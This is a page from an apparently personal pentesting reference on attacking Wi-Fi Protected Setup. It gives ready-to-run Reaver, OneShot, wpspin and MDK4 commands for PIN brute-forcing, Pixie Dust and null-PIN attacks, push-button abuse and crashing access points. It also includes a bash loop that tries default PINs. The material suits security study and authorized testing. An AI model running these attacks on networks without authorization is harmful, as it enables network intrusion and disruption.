Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • WPS Connection Methods
  • Security Concerns
  • WPS PIN Anatomy
  • Cracking Methods
  • WPS Reconnaissance
  • Online PIN Brute-Forcing
  • Pixie Dust Attack
  • Push Button Configuration
  • Crashing a Target AP with MDK4
  1. WIFI Hacking

WPS Hacking

PreviousWIFI HackingNextMisc Tools

Last updated 5 months ago

WPS was originally developed by Cisco in 2006 as a method to enable convenience and ease of use for users with little knowledge. Either through the push of a button or entering of a PIN users are able to easily connect their devices to their wireless network. Since then, multiple different exploitation tools have been developed with the intent to abuse the PIN. WPS PINs are eight digits in length, making them significantly easier to crack compared to traditional WPA methods.

WPS Connection Methods

There are four methods to connect to a WPS-enabled access point. Each of them is detailed below:

Security Concerns

PIN Method Vulnerability: The 8-digit PIN can be cracked relatively easily through brute-force attacks due to the way the protocol verifies the PIN in two halves.

Physical Security Risks: The PBC method relies on physical security, meaning an unauthorized person within range could potentially push the button and connect to the network.

WPS PIN Anatomy

The WPS PIN is eight digits in length and consists of two primary portions. The first portion is used in the M4 and M5 EAP messages, and the second portion is used in the M6 and M7 EAP messages. Each of these portions is four digits in length. Most would assume that there would be 100,000,000 (10^8) possible digit combinations, but in the case of WPS, this is not true. There are only 11,000 possible combinations.

This is due to how the PIN functions. The first half only has 104 possible combinations and the second half has only 103 possible combinations. The last digit of the second half is used as a checksum and can be easily calculated. Therefore, there are only 10,000 (104) + 1,000(103) possible digit combinations, which is 11,000 total combinations.

Cracking Methods

  1. Online brute-forcing

  2. Offline brute-forcing, also known as the Pixie Dust Attack

WPS Reconnaissance

In order to analyze a target network, we need to view its WPS information. We can do so with several different tools. Some of the information we hope to attain is the MAC address of the access point and which WPS version it is using. The MAC address is useful because an easy vendor lookup may allow us to find that the access point's vendor may or may not be susceptible to different kinds of WPS attacks. This can easily be done with a bit of research, and later we will explore custom PIN generation based on this information. Additionally, we want to find which version of WPS is running, along with which mode it is in, as it will help us narrow down which attack techniques to employ.

If an access point is running WPS version 2.0 it is unlikely that we will be able to use any vector beyond pixie dust attacks, possibly null pin attacks, and brute forcing attempts with very long reattempt periods. This is due to a few factors, such as a locking feature built into most access points. After a certain amount of incorrectly guessed PINs the access point locks and requires either a reboot or timeout for additional PIN guesses.

Putting Card in Monitor Mode and scanning WPS Networks

airmon-ng start wlan0

For reaver to work, use the following command to put in monitor moder.

iw dev wlan0 interface add mon0 type monitor

Then we can start monitoring WPS networks

airodump-ng --wps --ignore-negative-one wlan0mon

We could also narrow down our scan further to just our network in question with the following command. We specify the channel with -c and the AP MAC with --bssid

airodump-ng --wps --ignore-negative-one -c 1 --bssid D8:D7:3D:EB:29:D5 wlan0mon

Wash is another great tool for scanning networks with WPS. We can employ a simple command with wash to display all networks with WPS and their respective versions

wash -i wlan0mon

We can display much more verbose output with wash using the following command.

wash -j -i wlan0mon

Finding Vendor

we can find out which vendor is associated with the access point with the following command, specifying the beginning of the MAC address.

grep -i "84-1B-5E" /var/lib/ieee-data/oui.txt

Things to be wary of when testing WPS

  1. The WPS version. wps_locked status: We want to ensure that clients can join the network.

  2. The WPS Mode: If we need to press a button to join the network, chances are we are not cracking the PIN this way.

  3. Max PIN Attempts Locking: If the access point locks after a few incorrectly guessed PINs, we likely will not be able to get through all 11,000 possible combinations.

Online PIN Brute-Forcing

Reaver

Reaver is an excellent tool for conducting online password cracking attempts. It offers various options, including Null PIN attacks, custom PIN associations, Pixie Dust Attacks, and general brute-forcing.

iw dev wlan0 interface add mon0 type monitor
reaver -i [interface] -b [BSSID] -c [channel]
reaver -i mon0 -b 22:DD:48:FA:35:E9 -c 1 

Bruteforcing Half Known Pins

If we know the first four digits of the WPS PIN, we can use Reaver to bruteforce the remaining four digits. We can provide the known half PIN using the -p option followed by the first four digits. For example, if the known first half of the PIN is 1234, we would use -p 1234.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 8487

Testing for Null PIN

Suppose neither of these succeed, we could also attempt a Null PIN attack. Some access points are vulnerable to Null PIN attacks and will even disclose the WPA-PSK when no PIN is sent. We can do so by employing the following command, specifying the Null PIN with -p "" or -p " ".

reaver -b 7E:A3:5A:22:C5:90 -c 1 -i mon0 -p " "

Retrieving WPA-PSK using Reaver with a Known PIN

If one of our brute forcing attempts succeeds, we can use the following command to verify the captured PIN. Alternatively, if the access point has a label with the PIN physically printed on the backside of the router, we can use this information to retrieve the WPA-PSK for the WiFi network. This method leverages the default PIN provided by the manufacturer to potentially gain access to the network. For the technique of using the PIN printed on the label to retrieve the WPA-PSK, the access point (AP) must be in label mode.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 84870575

Secured Access Points

Traditionally, online brute-forcing attempts have been utilized in retrieving the WPS PIN and WPA-PSK. However, in recent years, manufacturers have become wiser to these attacks. As such, locking has been utilized to prevent these traditional bruteforcing techniques. The most recent vendors only allow up to 3 incorrect attempts. After each incorrect attempt, the AP will lock for 60 seconds. After 10 incorrect attempts, the AP will lock for 365 days.

Using Multiple Pre-defined PINs

While it is possible to bruteforce the WPS PIN using Reaver, we can also use a custom wordlist of potential PINs. In this section, we will explore how to generate possible PINs for a WiFi network using wpspin and then create a custom bash script to bruteforce the access point with these PINs.

The WPSPin tool is a powerful tool that includes many different PIN generation algorithms. This tool allows us to once again provide the BSSID of our target network and receive a list of possible default PINs.

git clone https://github.com/drygdryg/wpspin.git
sudo python setup.py install
wpspin -A 60:38:E0:A2:3D:2A

WPSPin outputs a variety of possible PINs for valid BSSIDs. To retrieve the WPA-PSK from a known PIN, we can use the following command.

sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410

In the above command, -l sets the time to wait if the access point locks WPS PIN attempts, which is set to 100 seconds. The -r option specifies the recurring delay, meaning the command will sleep for 45 seconds every 3 attempts. The --max-attempts=1 specifies that the tool will only attempt the PIN one time. This option ensures that the PIN is tested just once, rather than multiple attempts.

We can extract only the pins from the wpspin output using a combination of grep and tr commands:

wpspin -A 60:38:E0:A2:3D:2A | grep -Eo '\b[0-9]{8}\b' | tr '\n' ' '

We can now store this output in a variable of a bash script and use it for brute-forcing WPS

#!/bin/bash

# Define the list of generated PINs
PINS='76142673 24952910 31080279 31080279 10149713 42705239 65814352 35934868 20660413 53157652 84636386 91629487 52285349 28428015 51018658 66505471 04217176 12345670 20172527 46264848 76229909 62327145 10864111 31957199 30432031 71412252 68175542 95661469 95719115 48563710 20854836 43977680 05294176 99956042 35611530 67958146 34259283 94229882 95755212'

# Loop through each PIN in the list
for PIN in $PINS; do
    echo "Attempting PIN: $PIN"
    
    # Execute reaver command with the given PIN
    sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 72:40:6E:74:2F:3B -v -c 1 -p "$PIN"
    
    # Check if the command executed successfully
    if [ $? -ne 0 ]; then
        echo "An error occurred while attempting PIN: $PIN"
    fi
done

echo "PIN guesses complete."

For each generated PIN attempted, the script will try the PIN only once, and then wait for 100 seconds if the access point (AP) locks Additionally, for every three attempts made, it will pause for 45 seconds. The script iterates through all the PINs in the list, which can be seen in action in the example below:

Using PIN Generation Tools

When crafting an online brute-forcing attempt, it can be cumbersome to guess all 11,000 possible PINs especially considering most access points are utilizing default PINs. Luckily, over the years many different libraries and tools have been developed to generate these default PINs. Some of these include the Arcadyan, Vodafone EasyBox, and ComputePIN default generation algorithms

Pixie Dust Attack

Some vendors such as Ralink, Realtek, MediaTek, and Broadcom are susceptible to offline bruteforcing techniques through the Pixie Dust Attack. This is due to bad randomization during nonce generation. The E-S1 and E-S2 nonce values are 128-bits. As such, if we were to try to blindly bruteforce the hash values through variable brute force, this would take a very long time. Due to certain vendors having bad/predictable nonce value generation, we can retrieve these values, which makes bruteforcing on the E-Hash1 and E-Hash2 values much quicker. This helps eliminate the need to conduct online bruteforcing through every iteration of a possible PIN.

Reaver

We can use Reaver to perform a Pixie Dust attack against it, specifying the -K (or --pixie-dust) option.

reaver -K 1 -vvv -b 7E:E7:15:97:2D:6F -c 1 -i mon0

We can subsequently use this PIN to obtain the PSK (Pre-Shared Key) for the WiFi network.

reaver -b 7E:E7:15:97:2D:6F -c 1 -p 32452370 -i mon0

Oneshot

We need to put our interface in monitor mode with airodump

To perform a Pixie Dust attack using OneShot, we again require our interface to be in monitor mode. However, before proceeding, we should delete the previously configured mon0 interface.

iw dev mon0 del
airmon-ng start wlan0

Similar to Reaver, OneShot also includes the -K (or --pixie-dust) argument. Let's apply this option and initiate the attack.

sudo python3 /opt/OneShot/oneshot.py -i wlan0mon -b 7E:E7:15:97:2D:6F -K

Push Button Configuration

Push Button Configuration (PBC) is a simple and user-friendly method for connecting devices to a wireless network using Wi-Fi Protected Setup (WPS). It’s particularly useful for users who want to avoid entering complex passwords. PBC is a feature of WPS that allows users to connect devices to a Wi-Fi network by simply pressing a physical button on the router/AP and the connecting device, instead of entering a password.

How Does PBC Work? Physical Button Press: Most routers and access points have a WPS button that triggers PBC. Automatic Pairing: After pressing the button, the router will listen for new device requests to connect for a set time (usually two minutes). During this period, any device that requests access can connect without needing a password. Device Side Interaction: The connecting device (e.g., smartphone, smart TV, etc.) typically has an option to connect via WPS. After selecting this, the device searches for routers or access points in PBC mode and establishes a connection. The connection is established without the need to enter a password manually.

We can use airodump-ng to check if the Wi-Fi network is in Push Button Configuration (PBC) mode

airodump-ng wlan0mon -c 1 --wps

Consider a scenario where we are performing a wireless penetration test and discover an access point with WPS enabled. Since we're onsite at the client's office, we have direct access to the router. In this situation, we can physically press the WPS button on the back of the router, allowing us to connect to the access point without having to manually enter a password. We can achieve this by using tools such as oneshot for automated execution, or manually by utilizing wpa_cli to establish the connection.

We can also use Oneshot to automate the exploitation of PBC. Oneshot will automatically generate the valid WPS PIN and WPA passphrase for the access point. To use Oneshot, we first need to enable monitor mode on the wlan0 interface by using airmon-ng. Once monitor mode is enabled, we can run Oneshot with the --pbc argument to connect using PBC mode.

python3 /opt/OneShot/oneshot.py -i wlan0mon --pbc

wps_cli

First, we need to scan for available access points to obtain their BSSID. This can be done using the iwlist scan command, as demonstrated below.

iwlist wlan0 scan |  grep 'Cell\|Quality\|ESSID\|IEEE'

Alternatively, we can achieve the same result with wpa_cli.

wpa_cli scan_results

Once we have identified our target BSSID, we immediately press the WPS button on the back of the router and execute following command.

wpa_cli wps_pbc D8:D6:3D:EB:29:D5

After a few seconds, we can check wpa_supplicant to verify that we've successfully connected to the Wi-Fi network.

systemctl status wpa_supplicant

We can use dhclient followed by the interface name, such as wlan0, to obtain a valid IP address within the access point's subnet.

sudo dhclient wlan0

Crashing a Target AP with MDK4

During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts:

sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11

The second kind of WPS lock is one that requires the AP to be reset, either through a power cycle or some other means, after too many incorrect PIN attempts. This can dissuade us as attackers from continuing WPS PIN retrieval techniques. However, Authentication Denial-of-Service and EAPOL Start and Logoff packet injection flooding attacks can grant us this access point reset. In some cases, this will remove the WPS lock. It is worth noting that not all access points are vulnerable to these two aggressive techniques, and these techniques are truly a last resort. In some instances, the access point will crash, while the WPS lock remains enabled.

During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts.

Suppose our access point displays a locked status. This will halt all PIN attempts occurring in the first terminal. Luckily, MDK4 includes functionality in its attack modules for both Authentication Denial-of-Service and EAPOL Start and Logoff Packet Injection flooding. In our third terminal, we can employ the following command to test for Authentication Denial-of-Service flooding. We specify attack module a for Authentication Denial-of-Service, and our access point's MAC address with -a.

sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX

Crashing a target access point (AP) with MDK4 is a method that only works on very old routers. Recent routers are not vulnerable to this type of Denial-of-Service (DoS) attack.

Authentication Denial-Of-Service attacks will continue to spoof MAC addresses to authenticate to the network. This floods the access point's client list, and in many cases causes the access point to crash, thus resetting it. This can enable us to redeem an unlocked WPS status. Alternatively, we could attempt this same attack with the Intelligent Test on the access point. The Intelligent Test connects clients against the AP and reinjects sniffed data to keep them alive.

sudo mdk4 wlan0mon a -i 60:38:E0:XX:XX:XX

If our access point is still displaying a locked status in our second terminal, we could then attempt an EAPOL Start and Logoff Packet Injection attack. In the third terminal, we have our choice of EAPOL Start or EAPOL Logoff messages. To use EAPOL Start messages, we run the following command.

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX

To use EAPOL Logoff messages to kick clients off the network, we can employ the command seen below

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX -l

Alternatively, we could leave our EAPOL Start message MDK4 command running in our third terminal and begin the EAPOL Logoff messages in a fourth terminal. We can also utilize a deauthentication attack to kick clients.

GitHub - linkp2p/WPS-PIN: # This scripts is edited under the General Public License as defined by the Free software foundation. # This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to, it CANNOT be # sold or be used for a commercial-economical purpose. # See the details in the file LICENCE.txt that is situated in the folder of the script or visit http://gplv3.fsf.org/ ) # The discovery of One algorithm used in WPSPIN have been made parallely and previously by zhaochunsheng in a C. script named computepinC83A35. as i don't known C or # programming and found this out after coding the first version of WPS, this bash script doesn't use a dingle line of computepinC83A35. # But it had to be saved that zhaochunsheng found the main algorithm on Chinese access points months before I found it on a new Belkin N router, without knowing it works. # The page of the author is sadly down and i cannot link you to a straight source # This code wouldn't have been possible with the help and advices of antares_145, r00tnuLL and 1camaron1, thanks to them billion a billion time :) # It wouldn't have been possible neither without my beloved lampiweb.com work crew, maripuri, bentosouto, dirneet, betis-jesus, compota, errboricobueno, pinty_102 nad all users # greetings to crack-wifi.com familly, yasmine, M1ck3y, spawn, goliate, fuji, antares has been already credited, koala, noireaude, vances1, konik etc... and all users # greetings to auditoriaswireless.net and thanks to the big chief papones for the hosting and greetings to everybody # This code uses wps reaver that has to be installed on it own, reaver is a free software (http://code.google.com/p/reaver-wps/) (GPL2) by Tactical Network Solutions. Thanks to # them for this amazing work # You also need aircrack-ng, thanks to Mister X and kevin devine for providing the best suite ever (http://www.aircrack-ng.org/) # I would like also to thanks Stefan Viehbock for all is amazing work on wps (http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/) HOW TO USE WPSPIN? - Unzip the package that you download < unzip WPSPIN > - once situated in the created folder (cd WPSPIN) launch the script with < bash WPSPIN.sh > REQUIREMENTS If you use WPSPIN as a simple generator no requierement. If you want to enjoy the scan and attack feature you need: - a wireless interface with a chipset compatible with mode monitor - aircrack-ng installed in yout system - WPS reaver installed you can visit crack-wifi.com, lampiweb.com and auditroias-wireless.net to get indormattion and help about WPSPIN and others issues like thiese ones Just follow the script, it is very simple CHANGELOG # 1.1 (10-12-2012) # - Support for PIN beginning with one or several 0 thanks to the data of atim and tresal. # - New MAC supported : 6A:C0:6F (HG566 default ESSID vodafoneXXXX ) # 1.2 (12/12/2012) # - Fixed output bugs in backtrack and other distributions # - Added support to the generic default PIN known # 1.3 (23/01/2013) # - New supported devices: # - 7 bSSID vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4 # - 2 bSSID WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F # - 2 new models affected: # 1) SWL (Samsung Wireless Link), default ESSID SEC_ LinkShare_XXXXXX. 2 known affected BSSID > 80:1F:02 / E4:7C:F9 # 2) Conceptronic c300brs4a (default ESSID C300BRS4A ) 1 BSSID known > 00:22:F7 # - Rules to check the validity of the mac address (thanks r00tnuLL and anteres_145 for your codes) # - More filter for some case where several default ssid are possible,check the difference between ssid and bssid for FTE for possibles mismatch... # - More information displayed when a target is selected # - Display and colours problems are definitively solved for all distributions, one version # - Rewriting of code (tanks to r00tnuLL, antares_145, goyfilms and 1camron1 for their advices and feed back) # 1.4 ( 22/05/2013) # - Complete Rewriting of code to provide new functions: # - Multi language # - A automated mode using wash and reaver # - Interfaces management (automatic if only one interface is present, acting as filter if no mode monitor is possible to reduce options) # - New supported bssid # - 2 news bssid for FTE-XXXX (HG532c) 34:6B:D3 and F8:3D:FF # - 17 new bssid for vodafone HG566a # 62:23:3D 62:3C:E4 62:3D:FF 62:55:9C 62:7D:5E 62:B6:86 62:C7:14 6A:23:3D 6A:3D:FF 6A:7D:5E 6A:C6:1F 6A:D1:5E 72:3D:FF 72:53:D4 72:55:9C 72:6B:D3 72:A8:E4 # - New supported devices ( 9 models ) # - TP-LINK > TD-W8961ND v2.1 default SSID TP-LINK_XXXXXX 3 known bssids ; F8:D1:11 B0:48:7A 64:70:02 # - EDIMAX > 3G-6200n and EDIMAX > 3G-6210n bssid ; 00:1F:1F defaukt SSID : default # - KOZUMI > K1500 and K1550 bssid : 00:26:CE # - Zyxel > P-870HNU-51B bssid : FC:F5:28 # - TP-LINK TP-LINK_XXXXXX TL-WA7510N bssid : 90:F6:52: # - SAGEM FAST 1704 > SAGEM_XXXX bssid : 7C:D3:4C: # - Bewan iBox V1.0 > one bssid 00:0C:C3 for two ssids with different defaukt PIN > DartyBox_XXX_X and TELE2BOX_XXXXGitHub
GitHub - kcdtv/nmk: WiFi Scanner and Default WPS PIN Generator for Livebox 2.1 and Lievbox Next from Orange (Spain)GitHub
Logo
Logo